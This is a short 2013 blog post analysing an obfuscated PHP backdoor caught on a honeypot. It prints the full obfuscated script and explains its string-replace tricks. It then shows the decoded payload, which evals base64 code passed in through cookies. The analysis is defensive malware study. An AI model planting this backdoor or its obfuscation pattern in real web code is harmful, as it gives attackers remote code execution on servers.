Tuesday, November 19, 2013

Iloveyou PHP Backdoor

One of my botnet eh honeynet managed to caught up this nifty PHP script.

$sdfv="oofJGEpofPjMpeyRrPSdvofdmVof5b3UnofO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19";
$kisg = str_replace("ar","","sartarrar_rarearparlaracare");
$ltjz="yZofXBsYWNlKGFycmofF5KCcvW15cdz1cc10vJywnL1xzLycpLCBhofcnJofheSofgnJywnKycpL";
$ynsx="CBqb2luKGFycmF5X3NsaWNoflKCRofhLofCRjKCRhKS0zKSofkpKSkof7ZWNobyAnofPC8nLiRrLiofc+Jztof9";
$dkhg="JGofMof9J2NvofdW5of0JzskYT0kX0NPT0tofJRTtpZihyZXNldCgkYSk9ofPSdpbCcgJiYgJGMof";
$gsqn = $kisg("dk", "", "bdkadksdkedk64dk_dkddkecdkode");
$zuzt = $kisg("z","","zczrzezatze_zfzuznzcztzion");
$lyyq = $zuzt('', $gsqn($kisg("of", "", $dkhg.$sdfv.$ltjz.$ynsx))); $lyyq();?>

It's pretty much straight forward just by having a glance on it.

$kisg  = is actually string_replace
$gsqn =  base64_decode
$zuzt  = create_function

Cleaning this bad ware stuff  will give us

$lyyq = create_function(base64_decode("JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkYSk9PSdpbCcgJiYgJGMoJGEpPjMpeyRrPSdvdmV5b3UnO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19yZXBsYWNlKGFycmF5KCcvW15cdz1cc10vJywnL1xzLycpLCBhcnJheSgnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKCRhKS0zKSkpKSk7ZWNobyAnPC8nLiRrLic+Jzt9"));

Final Output:

$lyyq = create_function($c='count';$a=$_COOKIE;if(reset($a)=='il' && $c($a)>3){$k='oveyou';echo '<'.$k.'>';eval(base64_decode(preg_replace(array('/[^\w=\s]/','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));echo '</'.$k.'>';})


Conclusion? The author of this backdoor must be romantic..